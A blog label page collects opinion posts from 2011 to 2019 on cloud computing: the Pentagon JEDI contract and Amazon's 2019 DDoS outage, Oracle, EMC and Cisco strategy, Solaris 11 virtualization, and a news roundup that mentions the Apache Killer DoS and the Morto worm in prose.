Showing posts with label cloud computing. Show all posts
Showing posts with label cloud computing. Show all posts

Monday, November 4, 2019

Distributed Denial of Service, Amazon Cloud & Consequences

[Amazon Web Services Logo, Courtesy Amazon]

Distributed Denial of Service, Amazon Cloud & Consequences

Abstract

The US Military had been involved in advancing the art of computing infrastructure since the early days of computing. With many clouds built inside the Pentagon, a desire to standardize on an external cloud vendor was initiated. Unlike many contracts, where vendors were considered to compete with one another for a piece of the pie, this was a "live and let die" contract, for the whole proverbial pie, not just a slice. Many vendors & government proponents did not like this approach, but the proverbial "favoured son", who had a CIA contract, approved. This is that son's story.


Problems of Very Few Large Customers

Very few large customers create distortions in the market.
  1. Many understand that consolidate smaller contracts into very few large contracts is unhealthy. Few very large single consumers, like the Military, create an environment where  suppliers will exit the business, if they can not win some business, since the number of buyers is too small, limiting possible suppliers in time of war.
  2. Some complain that personal disputes can get in the way of objective decision making, in large business transactions.
  3. Others warn that political partisanship can wreck otherwise potential terrific technology decisions.
  4. Many complain that only a few large contracts offer opportunity for corruption at many levels, because the stakes are so high for the huge entities trying to gain that business.
  5. In older days, mistakes by smaller suppliers gave opportunity for correction, before the next bid... but when very few bids are offered, fleeting opportunities require substantially deep pockets to survive a bid loss
  6. Fewer customer opportunities discourages innovation, since risk to be innovative may result in loss of an opportunity when a few RFP providers may be rigidly bound by restraints of older technology requests and discourages from higher costing newer technology opportunities
In the end, these logical issues may not have been the only realistic problems.


[Amazon Gift Card, Courtesy Amazon]

Amazon's Business to Lose

From the very beginning, Amazon's Jeff Bezos had his way in. Former Defense Secretary James Mattis, hired Washington DC Lobbyist Sally Donnelly, who formerly worked for Amazon, and the Pentagon was soon committed to moving all their data to the private cloud. The irony is that Bezos, who has a bitter disagreement with President Trump, now had a proverbial "ring in the nose" of President Trump's "second in command" with the Armed Forces, in 2017.

Amazon's Anthony DeMartino, a former deputy chief of staff in the secretary of defense’s office, who previously consulted for Amazon Web Services, was also extended a job at Amazon, after working through the RFP process.

Features of the Amazon Cloud, suspiciously looked like they were taylor written for Amazon, requesting features that only Amazon could offer. Competitors like Oracle had changed their whole business model, to redirect all corporate revenue into Cloud Computing, to even qualify for the $2 Billion in revenue requirement to be allowed to bid on the RFP! How did such requirements appear?

Amazon's Deap Ubhi left the AWS Cloud Division, to work at the Pentagon, to create the JEDI procurement contract, and later return to Amazon. Ubhi, a venture capitalist, worked as 1 of a 4 person team, to shape the JEDI procurement process, while in secret negotiations with Amazon to be re-hired for a future job. The Intercept further reminded us:
Under the Procurement Integrity Act, government officials who are “contacted by a [contract] bidder about non-federal employment” have two options: They must either report the contact and reject the offer of employment or promptly recuse themselves from any contract proceedings.
The Intercept also noted that Ubhi accepted a verbal offer from Amazon, for the purchase of one of his owned companies, during the time of his working on the Market Research that would eventually form the RFP.

A third DoD individual, tailoring the RFP, was also offered a job at Amazon, according to Oracle court filings, but this person was marked from the record.

At the highest & lowest levels, the JEDI contract appeared to be "Gift-Wrapped" for Amazon.

[Amazon CEO Jeff Bezos hosting Trump's Former Defense Secretary James Mattis at HQ, courtesy Twitter]

Amazon Navigating Troubled Waters

December 23, 2018, President Trump pushes out Secretary of Defense James Mattis after Mattis offered a resignation letter, effective February 2019.

January 24, 2019, Pentagon investigates Oracle concerns unfair practices by hiring Cloud Procurement Contract worker from Amazon.

April 11, 2019, Microsoft & Amazon become finalists in the JEDI cloud bidding, knocking out other competitors like Oracle & IBM.

June 28, 2019, Oracle Corporation files lawsuit against Federal Government for creating RFP rules which violate various Federal Laws, passed by Congress, to restrict corruption. Oracle also argued that three individuals, who tilted the process towards Amazon, who were effectively "paid off" by receiving jobs at Amazon.

July 12, 2019, Judge rules against Oracle in lawsuit over bid improprieties, leaving Microsoft & Amazon as finalists.

August 9, 2019, Newly appointed Secretary of Defense Mark Esper and was to complete "a series of thorough reviews of the technology" before the JEDI procurement is executed.

On August 29, 2019, the Pentagon awarded it's DEOS (Defense Enterprise Office Solutions) cloud contract, a 10-year, $7.6 billion, to Microsoft, based upon their 365 platform.

On October 22, 2019, Secretary of Defense Mark Esper withdrew from reviewing bids on the JEDI contract, due to his son being employed by one of the previous losing bidders.

Serendipity vs Spiral Death Syndrome

Serendipity is the occurrence and development of events by chance with a beneficial results. The opposite may be Spiral Death Syndrome, when an odd event may create a situation where catastrophic failure becomes unavoidable.

What happens when an issue, possibly out of the control of a bidder, becomes news during a vendor choice?

This may have occurred with Amazon AWS, in their recent bid for a government contract. Amazon pushed to have the Pentagon Clouds outsourced, at one level below The President and even had the rules written for an RFP, to favor a massive $10 Billion 10 year single contract agreement favoring them.

October 22, 2019, A Distributed Denial of Service (DDoS) hitsAmazon Web Services was hit by a Distributed Denial of Service attack, taking down users of Amazon AWS for hours. Oddly enough, it was a DNS attack, centered upon Amazon C3 storage objects. External vendors measured the outages to last 13 hours.

On October 25, 2019, the Pentagon awarded it's JEDI (Joint Enterprise Defense Infrastructure) cloud contract, a 10-year, $10 billion, to Microsoft. The Pentagon had over 500 separate clouds, to be unified under Microsoft, and it looks like Microsoft will do the work, with the help of smaller partners.

Conclusions:

Whether the final choice of the JEDI provider was Serendipitous for Microsoft, or the result of Spiral Death Syndrome for Amazon, is for the reader to decide. For this writer, the final stages of choosing a bidder, where the favoured bidder looks like they could have been manipulating the system at the highest & lowest levels of government, even having the final newly installed firewall [Mark Esper] torn down 3 days earlier, is an amazing journey. A 13 hour cloud outage seems to have been the final proverbial "nail in the coffin" for a skilled new bidder who was poised to become the ONLY cloud service provider to the U.S. Department of Defense.

(Full Disclosure: a single cloud outage for Pentagon Data, just before a pre-emptive nuclear attack on the United States & European Allies [under our nuclear umbrella], lasting 13 hours, could have not only been disastrous, but could have wiped out Western Civilization. Compartmentalization of data is critical for data security and the concept of a single cloud seems ill-baked, in the opinion of this writer.)

Tuesday, January 22, 2013

Cisco Fires Shot at EMC: Parallels to Replace VMWare?

A very short update on Cloud Computing...

EMC: Build Their Own Server...
We remember that during EMC World in June 2012, EMC started the process of building their own cloud system... without Cisco.

EMC: The Missing Switch...
EMC acquired Nicira, to fix their hole in their networking stack, as discussed during VMWare World 2012 in August 2012. VMWare also started selling cloud engineering professional services.

Cisco: The Missing Hypervisor...
This left Cisco in a very difficult position - where would Cisco go to get a Hypervisor? Cisco just tool a significant equity stake in Parallels, in order to gain one. Perhaps, they should have thought about KVM on Illumos.

EMC & Cisco: The Missing OS...
While EMC and Cisco are continuing to gobble up components (still missing an OS) for their proprietary clouds, Oracle had released The First Cloud OS back in 2012 - it was called Solaris 11. Of course, Microsoft can't be left behind, copy'ing Oracle, saying Windows Server 2012 is the First Cloud OS! LOL!


Of course, Illumos is still an option for both EMC and Cisco... and Cisco would not have needed to buy an equity stake in Parallels, had they gone the Illumos route from the beginning. Joyent has been selling Clouds on Illumos for some time, even appearing in Gartner's Magic Quadrant starting in 2009.

What was Cisco thinking?

Wednesday, July 18, 2012

From Cloud 1.0, to Cloud 2.0, to Cloud 3.0

Abstract:
Meg Bear, Vice President, Oracle Cloud Social Platform, published an opinion blog article titled "Multi-Tenancy and Other Useless Discussions." Cited were two articles regarding "very strong opinions on either side of the multi-tenancy divide." The irony in this opinion article is that Meg does not seem to understand that Oracle has the technological lead among the giants in this arena, but are quickly losing their position. A subset of this post was submitted in a comment on Wednesday July 18th, a little after mid-day.

Oracle's Position
With the advance of massive ZFS storage capabilities from Oracle and hypervisors - there is tremendous opportunity for cloud based solutions to provide customers with incredible customization options.

Multi-tenancy offers the ability to offer consistent levels of service and features across multiple customers. Multi-tenancy also offers reduced overhead for the service provider to reduce costs in managing the solutions - which leads to greater application availability. Oracle has superior products which technologically corner this market.

A multi-tenant solution does not mean that every customer has to be on the same version of the software. New versions of the software can be rolled out in parallel and customers can "choose" which version they wish to be under... the former release or the newer release. Good multi-tenant solutions should never be monolythic, rather they should be modular and parallel.

The less capable an individual software solution is, the less isolation, scalability, and management features are offer. Less mature solution do not offer multi-tenancy. It is not necessarily an issue with "Cloud V1" vs "Cloud V2", as the Oracle CEO suggested, it is an issue with cloud solution maturity.



Let us illustrate:
The Oracle VM for SPARC hypervisor offers advanced Oracle ZFS filesystem capabilities with: massive dataset capability; encrypted datasets on a per-customer basis for storage, over-the-wire, and memory buffers for security; superior performance with hardware acceleration of compression (T5) and encryption (T1-T5); guaranteed data integrity & correction from the OS, through hypervisor, through memory, through HBA, over wire, to storage, and to the disk (at every layer of the stack); and much higher capacity & throughput via ZFS deduplication in memory, via hypervisor, over-the-wire, and on disk storage (and not just over the disk bus); and vastly superior visibility and analytics for live production systems with no application interruption with DTrace at every level of the hypervisor, to OS Kernel, through Java, to the application. Oracle owns all of this multi-tenant technology under "Cloud 1.0" - nearly everyone else just borrows some pieces to produce a popular (but technologically inferior) solution.


Why is this brought up?
These capabilities are notably missing from the Oracle VM for Intel hypervisor - the basis for "Cloud 2.0". Clouds based upon this solution are not as robust. Moving the ZFS to a dedicated storage infrastructure leaves gaping holes. From a cloud service delivery perspective, ZFS would need to run on the hypervisor or OS layer in order to: correct hidden data corruption introduced at and below the hypervisor layer (memory, backplane, HBA, wiring levels, etc.); provide throughput improvement via compression & deduplication (via memory, backplane, hypervisor, over-the-wire, storage subsystem); and provide massive storage capacity.


Security, data integrity, and performance drive multi-tenancy requirements. Applications run under "Cloud 1.0" and "Cloud 2.0" solutions. Oracle VM for Intel hypervisor needs to "get with the program" and gain some of these [nearly 10 year old] security, data integrity, and performance technologies leveraged by service providers in the traditional "Cloud 1.0" multi-tenant market as well as by some "Cloud 2.0" (Oracle-derived, but now independent) service providers.



Right now, there seems to be 3 technologies which completely satisfy market needs suggested by the CEO in "Cloud 2.0": Oracle VM for SPARC clouds (Oracle leaving this for other Multi-Tenant providers); Xen for Solaris Intel clouds (Oracle discarded); and KVM for OpenSolaris under Intel (Joyent produced SmartOS, based upon Illumos, based upon OpenSolaris.)


ZFS, Encryption, Compression, Deduplication, and Visibility are the technologies today. Filesystem clustering is tomorrow. Everything else is "just a cloud" floating by... based upon commodity Linux, without data integrity, without data security, without performance, without visibility, without clustering - but there is a thunderhead on the horizon.

Clustered filesystems in conjunction with ZFS fills a bigger hole, in what should be called the "Cloud 3.0" market. Honestly, a Cloud should use clustered filesystems with the data everywhere, with the data encrypted everywhere, with the data compressed everywhere, with the data deduplicated everywhere (and, of course, this means memory, the wire, and the storage.)


Intel x64, IBM POWER, and Oracle [any-architecture]
The HPC market is nothing more than a specialized cloud. Intel purchasing Whamcloud, for Oracle Lustre on Linus's Linux on Intel's x64, and IBM, layering Oracle Lustre on Oracle ZFS on Linus's Linux on IBM POWER, shows where the cloud market is moving towards. IBM pulling off what Oracle could not do, years after the purchase of Sun Microsystems. The market is clearly and proverbially "throwing down the gauntlet".

Oracle is the only vendor on the horizon who has the possibility of clearly layering Clustering on ZFS with full visibility, without sacrificing the performance of a Kernel implementation of ZFS and Lustre, under Oracle Solaris with a Solaris hypervisor, to produce (what I would refer to as) "Cloud 3.0".


If Oracle does not capitalize on "Cloud 3.0" by bundling Lustre, ZFS, and Solaris (on Intel with Xen, SPARC with LDom's) - Oracle "Cloud 1.0" multi-tenancy will still continue to be the 1000 pound gorilla in the room. Oracle (and nearly every other vendor, outside of Joyent) are "Cloud 2.0" Resus Monkies, lacking DTrace visibility and in-kernel clustering & ZFS. "Cloud 3.0" has the potential to dominate Oracle in technical capability, using derived Oracle technologies like ZFS, Lustre, and Xen (which both Oracle and Sun both participated in.)

With every technology Oracle ports to Oracle Linux, the more technology is "given away" to it's competitors, as it is absorbed "upstream" and sucked into Red Hat and Suse - who are recognized Linux vendors.
Network Management:
Network Management platforms used by Telecommunication Service Providers are dependent upon large multi-tenant software solutions. With Oracle Linux not showing up on Network Management software vendor list, the only serious options are SPARC Solaris, Intel Red Hat Linux, and Intel Windows.

The lack of an integrated clustered filesystem with ZFS under Solaris, has long dogged the telco providers. The drive towards Red Hat was relentless. The push by Oracle to "Cloud 2.0", without ever providing a technologically superior "Cloud 2.0" alternative under Intel (Windows, Linux, or Solaris) has left Oracle largely out of the picture.

The drive to "Cloud 3.0" appears strangely dim for Oracle, while it looks promising for OpenSolaris dependent vendors like Joyent. OpenSolaris based technologies (Solaris 11, SmartOS, Illumian, OpenIndiana, etc.) are superior to the dominate market players, but this could be pre-empted by Intel or IBM, as they fund the contribution of Oracle technologies to Linus and his Linux - to suck all value out of Oracle's "Cloud V1" and provide superior "Cloud V2" solution to anything that Oracle is supplying today.

 

Wednesday, June 20, 2012

EMC: Building The Cloud, Kicking Cisco Out?

EMC: Building The Cloud, Kicking Cisco Out?

Abstract:
EMC used to be a partner in the Data Center with a close relationship with vendors such as Sun Microsystems. With the movement of Sun to create ZFS and their own storage solution, the relationship was strained, with EMC responding by suggesting the discontinuance of software development on Solaris platforms. EMC purchased VMWare and entered into a partnership with Cisco - Cisco produced the server hardware in the Data Center while EMC provided VMWare software and with EMC storage. The status-quo is poised for change, again.

[EMC World 2012 Man - courtesy: computerworld]

EMC World:
Cisco, being a first tier network provider of choice, started building their own blade platforms, entered into a relationship with EMC for their storage and OS virtualization (VMWare) technology. EMC announced just days ago during EMC World 2012 that they will start producing servers. EMC, a cloud virtualization provider, a cloud virtual switch provider, a cloud software management provider, a cloud storage provider, has now moved into the cloud server provider.

Cisco Response:
Apparently aware of the EMC development work before the announcement, Cisco released FlexPods with NetApp. The first release of FlexPods can be managed by EMC management software, because VMWare is still the hypervisor of choice. There is a move towards supporting HyperV, in a future release of FlexPods. There is also a movement towards providing complete management solution through Cisco Intelligent Automation for Cloud. Note, EMC's VMWare vCenter sits as a small brick in the solution acquired by Cisco, including NewScale and Tidal.

[Cisco-NetApp FlexPod courtesy The Register]

NetApp Position:
NetApp's Val Bercovici, CTO of Cloud, declares "the death of [EMC] VMAX." Cisco has been rumored to have been in a position to buy NetApp in 2009, 2010, but now with EMC marginalizing Cisco in 2012 - NetApp becomes more important, and NetApp's stock is dropping like a stone.
[former Sun Microsystems logo]
Cisco's Mishap:
Cisco, missing a Server Hardware, Server Hypervisor, Server Operating System, Tape Storage, Disk Storage, and management technologies, decided to enter into a partnership with EMC. Why this happened, when system administrators in data centers used to use identical console cables for Cisco and Sun equipment - this should have been their first clue.

Had Cisco been more forward-looking, they could have purchased Sun and acquired all their missing pieces: Intel, AMD, and SPARC Servers; Xen on x64 Solaris, LDom's on SPARC; Solaris Intel and SPARC; Storage Tek; ZFS Storage Appliances; Ops Center for multi-platform systems management.

Cisco now has virtually nothing but blade hardware, started acquiring management software [NewScale and Tidal]... will NetApp be next?

[illumos logo]

Recovery for Cisco:
An OpenSolaris base with hypervisor and ZFS is the core of what Cisco really needs to rise from the ashes of their missed purchase of Sun and unfortunate partnership with EMC.

From a storage perspective - ZFS is mature, providing a near superset of all features offered by competing storage subsystems (where is the embedded Lustre?) If someone could bring clustering to ZFS - there would be nothing missing - making ZFS a complete superset of everything on the market.

Xen was created around the need for OpenSolaris support, so Xen could easily be resurrected with a little investment by Cisco. Cloud provider Joyent created KVM on top of OpenSolaris and donated the work back to Illumos, so Cisco could easily fill their hypervisor need, to compate with EMC's VMWare.

[SmartOS logo from Joyent]
SGI figured out they needed a first-class storage subsystem, and placed Nexenta (based upon Illumos) in their server lineup. What Cisco really needs is a company like Joyent (based upon Illumos) - to provide storage and a KVM hypervisor. Joyent would also provide Cisco with a cloud solution - a completely intregrated stack, from the ground on up... not as valuable as Sun, but probably a close second, at this point.

Wednesday, May 30, 2012

Ops Center: Manage Mission Critical Apps in the Cloud


Ops Center: Manage Mission Critical Apps in the Cloud

Abstract: 
This short video demonstrates how Oracle Ops Center, included in all Oracle hardware service contracts,  manages a private cloud hosting applications.
 

Wednesday, May 23, 2012

Cloud Migration: iPhone, iPodTouch, iPad



I considered a quick blog posting from Cloud Migration today:
I just keep thinking that the proliferation of iPads and tablets in the enterprise is leading us back to the path of thick client computing. Don't get me wrong, I love the iPad and believe it is a great device....for emails, surfing the web, playing music, playing games, and getting directions. However, it is as thick of a client device as you can get. In addition, just like 3270 screens were proprietary, they are a proprietary platform. It seems like just yesterday everyone was rushing to get off of client/server systems and move to thin client machines with browser based access.
Of course, I thought this was interesting, but this left me with a bunch of thoughts:

> proliferation of iPads and tablets in the enterprise is leading us back
> to the path of thick client computing

That is a very interesting thought.
  • UNIX is the firmware in the iPad, iPodTouch, iPhone
  • UNIX does not make it thick, Sun Workstations were thin
  • UNIX makes i* more Open.
There is virtually no customization on the client end,
so I don't quite think that i* are thick clients.


> just like 3270 screens were proprietary

iPhone's and iPad's were specifically called out, "tablets" suggest Windows, but Android is not quite Open...
  • Does Android comply with POSIX? OpenFirmware?
  • Is Android getting sued for using Java?

What are the thin alternatives?
  • SunRay's used to be SPARC based, but no longer. SPARC was Open.
  • SunRay's were never based upon Solaris. Solaris was Open.
  • SunRay's used a proprietary firmware, not based upon OpenBoot.
The SunRay's are more of an ultra-thin form factor, with firmware
that will update automatically (much the same way that i* devices
will, except the i* devices prompt the user for a convenient time
to update with the ability to customize their firmware.)

Other thoughts about thin clients:
  • I don't see SunRay's in i* or tablet form-factors.
  • I don't see SunRay's being sold by TelCo providers,
    as basic utilities leveraging their network infrastructure.
  • I don't see SunRay's clients provided by non-Oracle vendors

Don't get me wrong, I have 3 SunRay's on my desktop, this very moment,
running SPARC Solaris OpenLook desktops (CDE and JDS are way too heavy
and difficult to customize for real business usage.) All our users run
third-party apps off of an internal Solaris cloud that I built years ago.

Right now, the i* format factor is less expensive, easier to use,
and perceived as more open than other thin client technologies.

Honestly, there is no reason why clouds should not be built on SunRay's.


If clouds are not using SunRay's, then Oracle needs to figure out how to
fix it, and I will be the first one on-board to advocate migrating my
decade old private Solaris SPARC cloud providing 300 thin clients!

Thursday, December 29, 2011

Solaris 11: A Cloud in a Box!

Solaris 11: A Cloud in a Box!
Abstract:
Computing industry began with resource centralized on singularly large computing platforms. The microprocessor brought computing power into the hands of individuals in homes and offices, but information was still centralized in each location. The creation of The Internet allowed for the sharing of information between homes and offices, around the globe. Reliable server and telecommunications infrastructure was required to make it work, applications were somewhat limited to a handful of standard Internet protocols, such as HTTP. Cloud Computing has been coming of age over the past number of years, driving custom applications to proprietary API's, to move more applications into the Internet, but this is quickly changing as operating system vendors include more robust virtualization. Cloud Computing is really about the virtualization of Internet infrastructure, including servers, to a point where pieces do not have to reside on the internet, nor in an office, nor just a split between the two - but can reside anywhere, including entirely in a laptop. Solaris 11, the first Cloud Operating System, offers the ability to virtualize everything, from entire data centers across thousands of platforms, to thousands of platforms virtualized on a laptop.

Simulating The Cloud: A Practical Example

Joerg M., an Oracle employee and publisher of C0T0D0S0, discusses Solaris 11 with some of it's features, demonstrates the building of a cluster of virtual data centers within a single operating system instance. If someone runs a data center, they should consider reviewing the article to better comprehend the capabilities of what a "Cloud" could and should be.

It should be noted that "simnet" clause to the "create-simnet" and "modify-simnet" are formally undocumented, but documented in the OpenSolaris released source code, and leveraged in various other derived Open Source branches. One of the most important distributions being the Joyent SmartOS cloud operating system distributions.

Not Included, but Not Out Of Scope

What is not included in Joerg's example are actual systems on the edges of the cloud. Adding them is actually more trivial than adding the virtual routers which were created. Add virtual interfaces, virtual systems, databases to virtual systems, middleware to virtual systems, applications to virtual systems, add bandwidth & latency limitations to WAN links, add port limitations to virtual firewalls, etc.

Why Go Through the Exercize?

Once someone builds the entire datacenter "in the box", creation of the real data center becomes trivial. But why does this matter?
  • For the first time, real test environments can be simulated, soup-to-nuts, in an inexpensive way. There is no charge for virtualization in a Solaris world.
  • Costs can be reduced by placing all development systems into a couple of "clouds" for virtually any number (Solaris supports over 4000 zones on a single OS instance) of applications
  • Movement of an application from development to test is as easy cloning a Zone and instantiating the Zone on a Test platform.
  • Costs can be reduced by placing all test systems into a couple of clouds for virtually any number of applications
  • Deploying tested application is as easy as instantiating the cloned test Zone on a production system
  • Disaster recovery is as easy as instantiating the Zone on the dead physical system onto a physical system in an alternate data center.
  • Deploying production applications into a cloud is as easy as backing up the application and restoring it into the cloud - not to mention bringing it back.
  • The interactions of the application with Firewalls, WAN's and LAN's are all well understood, with everything being properly developed and tested, making each production deployment seamless
The effort, with a step-by-step process will ensure that there are no missed steps in the process to bringing virtualization to a business.

Implications to Network Management

The world is slowly exiting the physical world and Network Management is no longer about monitoring edge routers and links - it is about monitoring virtualized infrastructure. Orchestration is all about automated deployment and cloud providers are getting better at this. The missing piece to this puzzle is robust SNMP management of everything. The creation of network management infrastructure needs to happen in the development clouds first, then the test clouds, so when the jump to production is complete - the management infrastructure has already been simultaneously developed and tested, with the applications.

Monday, August 29, 2011

Technical Posts 2H August

Technical Posts 2H August

The following are technical articles related to Network Management in the past half-month.
  • Security: Devastating' Apache bug leaves servers exposed

    Attack code dubbed “Apache Killer” that exploits the vulnerability in the way Apache handles HTTP-based range requests was published Friday on the Full-disclosure mailing list. By sending servers running versions 1.3 and 2 of Apache multiple GET requests containing overlapping byte ranges, an attacker can consume all memory on a target system.

    The denial-of-service attack works by abusing the routine web clients use to download only certain parts, or byte ranges, of an HTTP document from an Apache server. By stacking an HTTP header with multiple ranges, an attacker can easily cause a system to malfunction.

  • Mobile: Dish eyes 4G LTE wireless network

    The radio spectrum owned by Dish, and LightSquared, is reserved for satellites, but as satellite transmissions have a hard time penetrating buildings and terrain operators are allowed to build an Ancillary Terrestrial Component* – infill transmitters operating at the same frequency as the birds and providing signal to those without line of sight.

    LightSquared turned that model on its head, suggesting that the ground-based network would be primary, with the satellite providing in-fill: estimated at around 2 per cent of traffic. LightSquared then successfully lobbied the FCC to permit it (and its wholesale customers) to ship equipment that isn't even capable of satellite communications, turning the company into a 4G network wholesaler without having to shell out for 4G spectrum.

  • Security: Worm spreading via RDP

    an Internet worm dubbed “Morto” spreading via the Windows Remote Desktop Protocol (RDP).

    F-Secure is reporting that the worm is behind a spike in traffic on Port 3389/TCP. Once it’s entered a network, the worm starts scanning for machines that have RDP enabled. Vulnerable machines get Morto copied to their local drives as a DLL, a.dll, which creates other files detailed in the F-Secure post.

    SANS, which noticed heavy growth in RDP scan traffic over the weekend, says the spike in traffic is a “key indicator” of a growing number of infected hosts. Both Windows servers and workstations are vulnerable.

  • Cloud: Java arrives on Heroku code cloud

    Heroku – the multi-language "platform cloud" owned by Saleforce.com – is now running Java applications.

    Akin to Google App Engine, Microsoft Azure, or VMware's Cloud Foundry, Heroku is an online service for building, deploying, and readily scaling applications. It was originally designed for Ruby on Rails apps, but has since expanded to Clojure, Node.js, and now Java.

  • Mobile: Why Apple is Removing Unique Identifiers

    Apple is planning to phase out unique device identifiers from iOS 5, according to documentation sent out to developers, possibly to stop people worrying about their privacy on iPhones and iPads... they should "create a unique identifier specific to your app".

    [Wall Stree Journal] Henschel also pointed to the recent spat between the notoriously secretive Apple and analytics firm Flurry as a possible spur for the move. In January, Flurry reported that it had identified around 50 tablet devices in testing at Apple's campus in Cupertino using its analytics.

    "Some company called Flurry had data on devices that we were using on our campus – new devices," Jobs said live at the D8 conference in New York. "They were getting this info by getting developers to put software in their apps that sent info back to this company! So we went through the roof. It's violating our privacy policies..."

  • Mobile: Nokia accidentally unveils OS it should have had in 2009

    Nokia is expected to unveil the a major refresh of its Symbian OS today, bringing it bang up to date with competitive phones from two years ago. Owners of more recent Symbian^3 models should be able to update their handsets eventually.

    Four new devices are expected to be unveiled – either today, or very shortly. The Belle update should keep loyalists happy for some time to come. Performance and usability appear to have been improved greatly.

  • Cloud: Performance Monitoring is Someone Else's Problem

    “Amazon and Google don’t have an army of service operatives monitoring their farms,” says Graeme Swan, a partner at consultancy Ernst & Young. “They basically smashed as much infrastructure as they possibly could into warehouses, and then just assumed that capacity would be there. Now, clients are telling them they want a premium service. They are worried that they have no way of monitoring it or tweaking it. So there is no premium service.”

    You can buy as much premium support as you like (although some question how well it works). Premium performance streams? Not so much.

  • Cloud: VMware turns shrink ray on open source dev cloud

    On Wednesday, the virtualization giant introduced Micro Cloud Foundry, a free downloadable version of its Cloud Foundry service that runs on a single laptop. This past spring, when VMware unveiled Cloud Foundry and open sourced the code behind it, the company indicated it would eventually offer a shrunken incarnation that would allow developers to test applications on their local machines.

  • Cloud: VMware turns self into (virtual) database co.

    vFabric Data Director has a utility pricing model, as you would expect, at a cost of $600 per VM under management per year that is running a database image. vFabric Postgres, VMware's tweaked and tuned version of PostgreSQL, is available free of charge for developers and will be available for download starting today at cloudfoundry.com.

    If you put a vFabric Postgres image into production, then it costs $1,700 per VM per year. The underlying vFabric 5.0 Standard Edition costs $1,200 per VM per year, while the Advanced Edition, which has more bells and whistles, costs $1,800 per VM. The Advanced Edition includes RabbitMQ messaging and an SQL interface for GemFire called SQLFire.

  • Cloud: Dell floats cloud built on ... VMware

    At the VMworld virtualization and cloud extravaganza in Las Vegas today, Dell said that it was fluffing up the Dell Cloud using VMware's brand-spanking-new ESXi 5.0 hypervisor, the vSphere 5.0 management tools for it, the vCloud Director cloud fabric, and the vCloud Connector extensions that allow a private cloud and a slice of a public cloud to be managed from the same console and to teleport jobs back and forth from the public and private clouds.

    The Dell Cloud comes out of the Dell Services unit, which is the amalgam of Dell's server and PC support business and consulting services practice with the Perot Systems system and application outsourcing business it acquired in September 2009 for $3.9bn.

  • Cloud: HP mates blades with VMware vSphere

    The VirtualSystem VS2 configuration for vSphere 5.0 moves to a bladed server and bladed Lefthand P4800 SAN arrays. The VS2 setup has a dozen BL460c G7 two-socket Xeon blade servers and two BladeSystem c7000 blade server chassis. Each blade has a dozen cores running at 3.06GHz

    The largest VirtualSystem for vSphere 5.0 setup is the VS3 box, which is designed to support up to 6,000 VMs. This monster has four BladeSystem c7000 chassis, a total of 64 of HP's ProLiant BL460c G7 servers

  • Mobile: Samsung 'considering purchasing' HP's orphaned webOS

    Samsung may be mulling over the purchase of webOS – recently orphaned by HP – in a move to protect itself from an increasingly unfriendly Apple and the threat of Google and its new toy, Motorola Mobility.

    Or so say "sources from notebook players", speaking with the Taiwanese rumor-and-news website, DigiTimes.

  • Cloud: VMware orders vCloud army across five continents

    VMware envisions a world where applications can roam across one big intercloud. Apps won't just jump from internal data centers to public cloud services, the company believes. They'll move from cloud to cloud like phone calls across cell networks.

    That's why VMware is keen on getting its vSphere server virtualization not only in the corporate data center, but out there on the service providers who want to be the next Amazon EC2. Then VMware can own the corporate cloud computing on both sides of the firewall.

  • Cloud: Citrix Cloud.com goes open source

    After taking control of the CloudStack cloud management framework through its acquisition of Cloud.com back in July, Citrix Systems is now open sourcing the code behind the tool. At the same time, it's adding support for the provisioning of workloads on additional hypervisors and, for the first time, on bare-metal machines.

    Cloud.com was founded in 2008 at about the same time as rival Eucalyptus Systems. It was known as VMOps before it came out of stealth mode in May 2010. Citrix is trotting out CloudStack 2.2.10, which has been certified to support rival VMware's ESXi 5.0 hypervisor, part of the vSphere 5.0 server virtualization stack that was annoumced in July and which started shipping last week.

    Citrix is trotting out CloudStack 2.2.10, which has been certified to support rival VMware's ESXi 5.0 hypervisor, part of the vSphere 5.0 server virtualization stack that was announced in July and which started shipping last week.

  • Internet: The case for a free market in IPv4 addresses

    Officially, the world ran out of IPv4 addresses earlier this year, when a final batch of addresses was divided among the five Regional Internet Registries. There are still a lot of unused and underused IP addresses in the hands of various private organizations. All that is needed is an incentive for them to part with their unused addresses voluntarily. In other words, what's needed is a market in IP addresses.

    Earlier this year, Microsoft paid $7.5 million for two-thirds of a million IP addresses that were previously held by a bankrupt Nortel, suggesting that the going rate for an IP address is around $10.

    Ford, Merck, Xerox, Halliburton, and nearly a dozen other companies not primarily in the networking business were each given a Class A block of 16 million addresses. MIT also got a Class A block, and the UK government got two of them. The US government claimed about a dozen Class A blocks, giving it control of nearly 200 million addresses—more IP addresses than all of Latin America has today.

  • Mobile: Sprint to get seat at grown-up table when iPhone 5 hits?

    Sprint will be the next carrier to offer the iPhone to customers in the US, according to sources speaking to the Wall Street Journal. The carrier will begin offering the iPhone 5 in October alongside AT&T and Verizon, both of which are also expected to begin selling the device mid-month, though it is believed that Sprint will also carry the iPhone 4, bolstering earlier rumors that Apple would keep around the iPhone 4 as the new low-cost replacement for the iPhone 3GS.

Network Management Connection

The transition from IP Version 6 from IP Version 4 may be a slow moving target. With companies like Microsoft buying large blocks and other companies holding millions - IP Addresses are like gold and oil. These investments may prove to not only be profitable, but the sale of these virtual goods may slow the implementation of IP V6.

Cloud Computing, based upon Virtualization technology from VMWare and Citrix open-sourced Xen continues to try to make inroads. Large system vendors like HP and Dell align themselves with proprietary VMWare. Oracle's VM technology maintains some level of compatibility with Citrix Xen. With Cloud Computing, the network becomes vastly more important.

Microsoft Windows has another WORM exposure, around it's proprietary RDP technology, based partially around file transfer options while UNIX Apache finds itself vulnerable to denial-of-service attacks. These key infrastructure points underpin modern intranet and internet computing today, both putting pressure on "the network". The Apache DoS merely makes it "look like" a network problem while another Microsoft worm really creates a possible capacity issue with "the network", if it can't be controlled.

HP finds itself bailing out of the mobile handset market (with Samsung possibly trying to buy it up for patent protections) dominated by heavy weights like Google (who ate Motorola's handset division and creates a mostly open-sourced based Android solution), Apple (with it's popular iPhone BSD UNIX parially open sourced solution), and Oracle (who is assaulting Google for using Java without paying license fees, like every other mobile vendor does.)

The mobile market has the opportunity to heat up, with more mobile 4G vendors hitting the market. By diversifying 4G to include Satellite vendors, in conjunction with Cell Phone operators, as well as land-line operators, in addition to new WiMax vendors (i.e. Clear) - there is the opportunity for a real explosion in the mobile network arena... which will all need to be managed. With dominant smart phone vendors like Apple possibly releasing iPhone for Sprint - this could really grow their market, as ATT and Verizon raise their costs to customers.

Tuesday, May 3, 2011

Open-Platform-as-a-Service






A Complete Application Ecosystem

